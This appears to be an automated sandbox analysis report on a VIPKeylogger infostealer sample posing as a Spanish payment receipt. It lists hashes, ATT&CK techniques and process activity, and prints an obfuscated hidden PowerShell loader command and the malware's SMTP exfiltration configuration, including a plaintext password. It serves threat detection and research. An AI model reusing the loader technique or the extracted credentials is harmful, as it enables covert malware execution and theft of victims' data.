vipkeylogger | 94786b06c92a58b375e26bc1328492f06baed13f77e8140f8a2cc892883b4c1e

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/10/2024, 12:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
Size

762KB
MD5

91ab88ebf2f83aa5c1b1979c37b9ffd3
SHA1

463501f21d5062bfd8f5acb5efd3c8e387e0bb0d
SHA256

94786b06c92a58b375e26bc1328492f06baed13f77e8140f8a2cc892883b4c1e
SHA512

7823d581290e5e53b11320ada2fa88346a1ed58dbd19476f3ee7a6b1e4ec26e21fe841975d93133afc87f820e95844baad34449d0aa6ac20077f2d9123af3fc4
SSDEEP

12288:EPpIEmdhqR0GV9XOOxg+Jf1PcezkBWIbyuwQL3OWntl81tTTZ/Oi5DwFyEionDu1:IpaCWGHXOOxgveC5yRQLvf81BV2m6iow

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.dimarbus.com
Port:
587
Username:
[email protected]
Password:
efe639812G
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1940	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Blocklisted process makes network request 8 IoCs

flow	pid	Process
41	116	msiexec.exe
43	116	msiexec.exe
45	116	msiexec.exe
47	116	msiexec.exe
50	116	msiexec.exe
53	116	msiexec.exe
55	116	msiexec.exe
59	116	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
40	drive.google.com
41	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
52	checkip.dyndns.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\folkepensionsaldres\frostbiter.ini	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
116	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1940	powershell.exe
116	msiexec.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Levitters.lnk	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
File opened for modification	C:\Windows\Levitters.lnk	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
116	msiexec.exe
116	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1940	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeIncreaseQuotaPrivilege	1940	powershell.exe
Token: SeSecurityPrivilege	1940	powershell.exe
Token: SeTakeOwnershipPrivilege	1940	powershell.exe
Token: SeLoadDriverPrivilege	1940	powershell.exe
Token: SeSystemProfilePrivilege	1940	powershell.exe
Token: SeSystemtimePrivilege	1940	powershell.exe
Token: SeProfSingleProcessPrivilege	1940	powershell.exe
Token: SeIncBasePriorityPrivilege	1940	powershell.exe
Token: SeCreatePagefilePrivilege	1940	powershell.exe
Token: SeBackupPrivilege	1940	powershell.exe
Token: SeRestorePrivilege	1940	powershell.exe
Token: SeShutdownPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeSystemEnvironmentPrivilege	1940	powershell.exe
Token: SeRemoteShutdownPrivilege	1940	powershell.exe
Token: SeUndockPrivilege	1940	powershell.exe
Token: SeManageVolumePrivilege	1940	powershell.exe
Token: 33	1940	powershell.exe
Token: 34	1940	powershell.exe
Token: 35	1940	powershell.exe
Token: 36	1940	powershell.exe
Token: SeDebugPrivilege	116	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 1940	2020	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	86
PID 2020 wrote to memory of 1940	2020	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	86
PID 2020 wrote to memory of 1940	2020	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	86
PID 1940 wrote to memory of 116	1940	powershell.exe	96
PID 1940 wrote to memory of 116	1940	powershell.exe	96
PID 1940 wrote to memory of 116	1940	powershell.exe	96
PID 1940 wrote to memory of 116	1940	powershell.exe	96

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Zinged=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\Stragglier\Scyphus\Chefassistent.Tro';$bagwyn=$Zinged.SubString(52013,3);.$bagwyn($Zinged)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    3⤵
    - Accesses Microsoft Outlook profiles
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Stragglier\Scyphus\Chefassistent.Tro

Filesize
50KB

MD5
41ba1786c8305fd337a4c1c154d091af

SHA1
848c471b48a57010eb18a329a974c514fe3d4009

SHA256
4fbbbd334722419f51ab3c5d956dd5feea3bc63dcd998bdc3cc987879de16d9f

SHA512
8926c198c1060c4724891a6cf192749eb5ff7dbc202d2c255be2448c24b45a161380ab3a8ec31cffc4e4091886b6b44e498eb1fd69eb75ba0a205ea31c1edf74

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stragglier\Scyphus\Populariserer.Syn

Filesize
300KB

MD5
137eeabecd5cfabf824f54b74e86916f

SHA1
b8759dd6c9a3d4aef893109e9991ca0f5c85f0fd

SHA256
9508f5c43aa379200efd79ed51cbb73a72d7079770a5abfd3772bcb31d696ce9

SHA512
50150337ff517324f5ce17e921949d04af39af071ffd241b052e3ff7327db01e29820a7ecfd04d0031b2a3afc06c4d1cd9eaa4392018878c240371fbc8778541

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0fhrw1te.zfx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/116-87-0x0000000000AC0000-0x0000000001D14000-memory.dmp

Filesize
18.3MB

Download
memory/116-89-0x0000000000AC0000-0x0000000000B08000-memory.dmp

Filesize
288KB

Download
memory/116-95-0x0000000024B30000-0x0000000024B3A000-memory.dmp

Filesize
40KB

Download
memory/116-94-0x0000000024B80000-0x0000000024C12000-memory.dmp

Filesize
584KB

Download
memory/116-92-0x0000000024A50000-0x0000000024AA0000-memory.dmp

Filesize
320KB

Download
memory/116-91-0x0000000025230000-0x00000000253F2000-memory.dmp

Filesize
1.8MB

Download
memory/116-90-0x0000000024580000-0x000000002461C000-memory.dmp

Filesize
624KB

Download
memory/116-88-0x0000000000AC0000-0x0000000001D14000-memory.dmp

Filesize
18.3MB

Download
memory/1940-43-0x0000000070040000-0x0000000070394000-memory.dmp

Filesize
3.3MB

Download
memory/1940-58-0x0000000007E80000-0x0000000007EAA000-memory.dmp

Filesize
168KB

Download
memory/1940-27-0x0000000006210000-0x0000000006564000-memory.dmp

Filesize
3.3MB

Download
memory/1940-32-0x00000000068A0000-0x00000000068BE000-memory.dmp

Filesize
120KB

Download
memory/1940-33-0x00000000068C0000-0x000000000690C000-memory.dmp

Filesize
304KB

Download
memory/1940-34-0x0000000007880000-0x0000000007916000-memory.dmp

Filesize
600KB

Download
memory/1940-35-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/1940-36-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/1940-37-0x0000000007EE0000-0x0000000008484000-memory.dmp

Filesize
5.6MB

Download
memory/1940-39-0x0000000008B10000-0x000000000918A000-memory.dmp

Filesize
6.5MB

Download
memory/1940-40-0x0000000007CD0000-0x0000000007D02000-memory.dmp

Filesize
200KB

Download
memory/1940-41-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-42-0x000000006FA90000-0x000000006FADC000-memory.dmp

Filesize
304KB

Download
memory/1940-21-0x00000000061A0000-0x0000000006206000-memory.dmp

Filesize
408KB

Download
memory/1940-54-0x0000000007D40000-0x0000000007DE3000-memory.dmp

Filesize
652KB

Download
memory/1940-55-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-53-0x0000000007D10000-0x0000000007D2E000-memory.dmp

Filesize
120KB

Download
memory/1940-56-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-57-0x0000000007E40000-0x0000000007E4A000-memory.dmp

Filesize
40KB

Download
memory/1940-20-0x0000000005B00000-0x0000000005B66000-memory.dmp

Filesize
408KB

Download
memory/1940-59-0x0000000007EB0000-0x0000000007ED4000-memory.dmp

Filesize
144KB

Download
memory/1940-60-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-62-0x000000007361E000-0x000000007361F000-memory.dmp

Filesize
4KB

Download
memory/1940-63-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-64-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-67-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-66-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-68-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-69-0x0000000009190000-0x000000000DA06000-memory.dmp

Filesize
72.5MB

Download
memory/1940-70-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-71-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-19-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/1940-18-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-16-0x0000000005B70000-0x0000000006198000-memory.dmp

Filesize
6.2MB

Download
memory/1940-17-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-15-0x0000000003280000-0x00000000032B6000-memory.dmp

Filesize
216KB

Download
memory/1940-14-0x000000007361E000-0x000000007361F000-memory.dmp

Filesize
4KB

Download
memory/1940-72-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download
memory/1940-74-0x0000000073610000-0x0000000073DC0000-memory.dmp

Filesize
7.7MB

Download